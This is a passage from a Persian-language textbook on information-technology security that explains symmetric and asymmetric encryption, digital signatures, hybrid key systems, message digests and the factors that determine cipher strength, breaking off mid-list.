‫ﺑﻠﻮﻙ )ﺗﻌﺪﺍﺩﻱ ﺑﺎﻳﺖ( ﺭﺍ ﺩﺭ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺟﺎﺭﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺖ ﺑﻪ ﺑﺎﻳﺖ )ﻳﺎ ﺣﺘﻲ ﺑﻴـﺖ ﺑـﻪ ﺑﻴـﺖ(‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻣﻮﺗـﻮﺭ ﻣﺤﺮﻛـﺔ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﻣـﺪﺭﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﻳـﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎ ﻋﻤﻮﻣـﹰﺎ ﺑـﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ ﺍﺯ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻭ ﻛﻤﺎﺑﻴﺶ ﭘﻴﺎﺩﻩﺳﺎﺯﻱﺷﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺳﻪ ﻣـﺸﻜﻞ‬
‫ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ‪:‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻃﺮﻓﻴﻦ ﺍﺭﺗﺒﺎﻁ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺑﻪ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺑﭙﺮﺩﺍﺯﻧـﺪ‪،‬‬ ‫•‬
‫ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺒﺎﺩﻟﻪ ﻛﻨﻨﺪ‪ .‬ﻣﺒﺎﺩﻟﻪ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﻬﺎ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺍﺭﺳﺎﻝ ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﻛﻨﻨﺪ‪ ،‬ﻫﺮ ﺩﻭ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﺭﺍ ﻧـﺰﺩ ﺧـﻮﺩ ﺩﺍﺷـﺘﻪ‬ ‫•‬
‫ﺑﺎﺷﻨﺪ ﻭ ﺁﻧﺮﺍ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻧﺪ‪ .‬ﺍﮔﺮ ﻛﻠﻴﺪ ﻳﻜﻲ ﺍﺯ ﻃﺮﻓﻴﻦ ﺍﺭﺗﺒﺎﻁ ﻣﺨﺪﻭﺵ ﺷﻮﺩ ﻭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺧﺒﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﻃﺮﻑ ﺩﻭﻡ ﺍﺭﺗﺒﺎﻁ ﺑﺮﺍﻱ ﻃﺮﻑ ﺍﻭﻝ ﭘﻴﺎﻣﻲ ﺍﺭﺳﺎﻝ ﻛﻨﺪ ‪ -‬ﻭ ﺁﻧﮕﺎﻩ ﺁﻥ ﭘﻴﺎﻡ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺨﺪﻭﺵﺷﺪﻩ ﻣـﻮﺭﺩ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﺍﮔﺮ ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺎﻳﻞ ﺑﺎﺷﻨﺪ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺍﺭﺗﺒﺎﻁ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻫﺮ ﺍﺭﺗﺒﺎﻁ ﺩﻭﻧﻔﺮﻩ ﺑـﻪ ﻳـﻚ ﻛﻠﻴـﺪ ﺭﻣـﺰ‬ ‫•‬
‫ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺑﺮﺍﻱ ‪ N‬ﻛﺎﺭﺑﺮ ﻣﺘﻔﺎﻭﺕ ﻣـﺴﺘﻠﺰﻡ ‪ (N2 - N) / 2‬ﻛﻠﻴـﺪ ﻣـﻲﺷـﻮﺩ‪ .‬ﺑـﺎ ﺍﻓـﺰﺍﻳﺶ ﺗﻌـﺪﺍﺩ‬
‫ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﺍﻳﻦ ﻋﺪﺩ ﺑﺴﺮﻋﺖ ﻏﻴﺮﻗﺎﺑﻞ ﻛﻨﺘﺮﻝ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬

‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻧﺎﻣﺘﻘﺎﺭﻥ‬


‫ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻳﻚ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﻛﻠﻴﺪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ‪ .‬ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ‬
‫ﻻ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻛﻠﻴﺪ ﺭﻣـﺰ ﻫﻤﮕـﺎﻧﻲ‪ ٧٧‬ﻣـﻲﻧﺎﻣﻨـﺪ‪،‬‬
‫ﻳﻚ ﺩﺳﺘﺔ ﻣﻬﻢ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻧﺎﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﭼﻮﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺧﺪﺷﻪﺍﻱ ﺑﻪ ﺳﺮﻱ ﺑﻮﺩﻥ ﭘﻴﺎﻡ ﻳﺎ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻭﺍﺭﺩ ﺷﻮﺩ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻫﻤﮕـﺎﻥ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻛﻠﻴـﺪ‬
‫ﻻ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ" ﻳﺎ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺳﺮﻱ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺑﺎ ﻣﺠﺰﺍ ﻛﺮﺩﻥ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ‪ ،‬ﻣﺸﻜﻼﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﮐﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺭﺍ ﺗﺎ ﺣﺪﻭﺩ‬
‫ﺯﻳﺎﺩﻱ ﺣﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﺯ ﺩﻳﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺌﻮﺭﻱ‪ ،‬ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺑﻄﻮﺭ ﻧﺴﺒﻲ ﻛﺎﺭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺁﺳﺎﻥ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﺎﻳﻠﻨﺪ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺩﺭﻳﺎﻓـﺖ ﻛﻨﻨـﺪ ﻛﻠﻴـﺪﻫﺎﻱ ﻫﻤﮕـﺎﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﻋﻤـﻮﻣﻲ ﻳـﺎ‬
‫ﮐﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺑﺎﺷﺪ‪ .‬ﺁﻧﮕﺎﻩ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﻳﻚ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ‪ ،‬ﺗﻨﻬﺎ ﻛﺎﺭﻱ ﻛـﻪ ﺑﺎﻳـﺪ‬
‫ﺍﻧﺠﺎﻡ ﺩﻫﻴﻢ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻓﺮﺩ ﺭﺍ ﺑﻴﺎﺑﻴﻢ‪ ،‬ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﻢ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺮﺍﻳﺶ ﺍﺭﺳـﺎﻝ ﻧﻤـﺎﻳﻴﻢ‪ .‬ﺩﺭ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺧﻮﺏ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺗﻨﻬﺎ ﻛﺴﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧـﺼﻮﺻﻲ ﻣﺘﻨـﺎﻇﺮ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺗﻨﻬﺎ ﭼﻴﺰﻱ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺩﺭ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨﻴﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﺧﻮﺩﻣﺎﻥ ﺍﺳﺖ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﭘﺪﻳﺪ ﺁﻭﺭﺩﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﮐﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪ .‬ﻳﻚ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣﺎﻧﻨـﺪ ﻳـﻚ ﺍﻣـﻀﺎﻱ‬
‫ﺣﻘﻴﻘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻥ ﻳﻚ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻣﺜﻞ ﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﻏﺬﻱ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺍﻣـﻀﺎ‬
‫ﻛﻨﻴﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺯ ﻧﻮﺷﺘﻪﺷﺪﻥ ﺁﻥ ﺗﻮﺳﻂ ﺧﻮﺩ ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻴﺪ؛ ﻭ ﻣﺎﻧﻨﺪ ﺍﻣﻀﺎﻱ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﻣﻮﺍﻓﻘﻨﺎﻣﻪ ﻓﺮﻭﺵ ﻣـﻲ‪-‬‬
‫ﺗﻮﺍﻧﻴﺪ ﻳﻚ ﺳﻨﺪ ﻣﻌﺎﻣﻼﺗﻲ ﺭﺍ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﻀﺎ ﻛﻨﻴﺪ ﺗﺎ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻛـﻪ ﻣﺎﻳﻠﻴـﺪ ﻛـﺎﻻﻳﻲ ﺭﺍ ﺳـﻔﺎﺭﺵ ﺩﺍﺩﻩ ﻳـﺎ ﺑﻔﺮﻭﺷـﻴﺪ‪ .‬ﺩﺭ‬

‫‪74‬‬ ‫‪Public Key Algorithms‬‬


‫‪75‬‬ ‫‪Block Algorithms‬‬
‫‪76‬‬ ‫‪Stream Algorithms‬‬
‫‪77‬‬ ‫‪Public Key‬‬
‫‪٢٩٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ‪ ،‬ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؛ ﻭ ﻟﺬﺍ ﺳﺎﻳﺮﻳﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺘﻨﺎﻇﺮ ﺍﺯ ﺻﺤﺖ ﺍﻣﻀﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﭘﺮﻫﺰﻳﻨﻪ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻋﻤﻞ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕـﺎﻧﻲ ﺑـﻪ‬
‫ﻗﺪﺭﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ ۱۰۰۰‬ﺑﺮﺍﺑﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻣﻌﺎﺩﻝ ﺧﻮﺩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻭ ﻧﻴـﺰ‬
‫ﺍﺯ ﺳﺮﻋﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺟﺪﻳـﺪ ﺩﺭ ﻭﺍﻗـﻊ ﺍﺯ ﻳـﻚ ﺗﺮﻛﻴـﺐ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ‪:‬‬

‫ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻋﻤﻮﻣﻲ ‪ /‬ﺧﺼﻮﺻﻲ ﺩﻭﮔﺎﻧﻪ‬


‫‪٧٨‬‬
‫ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻛﻪ ﻛﻨﺪﺗﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﺗﺼﺎﺩﻓﻲ ﺟﻠﺴﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ ،‬ﻛـﻪ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺒﻨﺎﻱ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﻣﺘﻘﺎﺭﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ )ﻳﻚ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺩﻭﺭﻩ" ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻚ ﺩﻭﺭﻩ ﻭﺍﺣﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﻜـﺎﺭ‬
‫ﻣﻲﺭﻭﺩ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻣﻲﺷﻮﺩ(‪ .‬ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﭘﻴﺎﺩﻩﺳﺎﺯﻱﻫﺎﻱ ﻋﻤﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱﻫﺎﻱ ﻫﻤﮕﺎﻧﻲ ﺍﺯ ﻧـﻮﻉ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺩﻭﮔﺎﻧـﻪ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﻧﻜﺘﻪ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺩﺳﺘﺔ ﺧﺎﺻﻲ ﺍﺯ ﺗﻮﺍﺑﻊ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻴﺸﻪ ﺑﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕـﺎﻧﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺍﺻﺎﻟﺘﹰﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ "ﺍﺛﺮ ﺍﻧﮕﺸﺖ" ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﻳﺎ ﻛﻠﻴﺪ ﺭﻣﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪:‬‬

‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ‬
‫ﻳﻚ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻳﻚ ﺍﻟﮕﻮﻱ ﺑﻪ ﻇﺎﻫﺮ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﺑﻴﺘﻬﺎ ﺑﺮﺍﻱ ﻫﺮ ﻭﺭﻭﺩﻱ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪ .‬ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪ ﺑﻪ ﻧﺤﻮﻱ ﻣﺤﺎﺳﺒﻪ ﻣـﻲﺷـﻮﺩ‬
‫ﻛﻪ ﻳﺎﻓﺘﻦ ﻳﻚ ﻭﺭﻭﺩﻱ ﻛﻪ ﺩﻗﻴﻘﹰﺎ ﻳﻚ ﺧﻼﺻﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﺒﺎﺷﺪ‪ .‬ﺧﻼﺻﻪﭘﻴﺎﻣﻬﺎ ﻏﺎﻟﺒﹰﺎ "ﺍﺛﺮ ﺍﻧﮕﺸﺖ‬
‫ﻓﺎﻳﻠﻬﺎ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻪ ﺟﺎﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺻﻠﻲ ﻓﺎﻳﻞ‪ ،‬ﺧﻼﺻﻪﭘﻴﺎﻡ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫ﻗﺪﺭﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﻣﺘﻘﺎﺭﻥ‬


‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﻧﻈﺮ ﻗﺪﺭﺕ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺑﺮﺍﺑﺮ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﻧﻈﺮ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﭼﻨﺪﺍﻥ ﺧـﻮﺏ ﻋﻤـﻞ‬
‫ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴﺪ ﻻﺯﻡ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺣﺘﻲ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﻗﻮﻳﺘﺮﻳﻦ ﺣﻤﻠﻪﻫﺎ ﻫﻢ ﺑﺴﻴﺎﺭ ﻣﻘﺎﻭﻡ ﻫﺴﺘﻨﺪ‪ .‬ﻗﺎﺑﻠﻴﺖ ﺣﻔﺎﻇﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻠﻪ ﺍﺳﺘﺤﻜﺎﻡ‪ ٧٩‬ﻧـﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺍﺳـﺘﺤﻜﺎﻡ ﺑـﻪ‬
‫ﻋﻮﺍﻣﻞ ﺯﻳﺎﺩﻱ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﺍﺯ ﺟﻤﻠﻪ‪:‬‬
‫ﺳﺮﻱ ﺑﻮﺩﻥ ﻛﻠﻴﺪ ﺭﻣﺰ؛‬ ‫ّ‬ ‫•‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻻ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳـﺎ ﺣـﺪﺱ ﺯﺩﻥ‬ ‫ﻣﺸﻜﻞ ﺑﻮﺩﻥ ﺍﻣﻜﺎﻥ ﺣﺪﺱ ﻛﻠﻴﺪ ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﺯﻣﺎﻳﺶ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ﻣﻤﻜﻦ )ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﺭﻣﺰ(‪ .‬ﻣﻌﻤﻮ ﹰ‬ ‫•‬
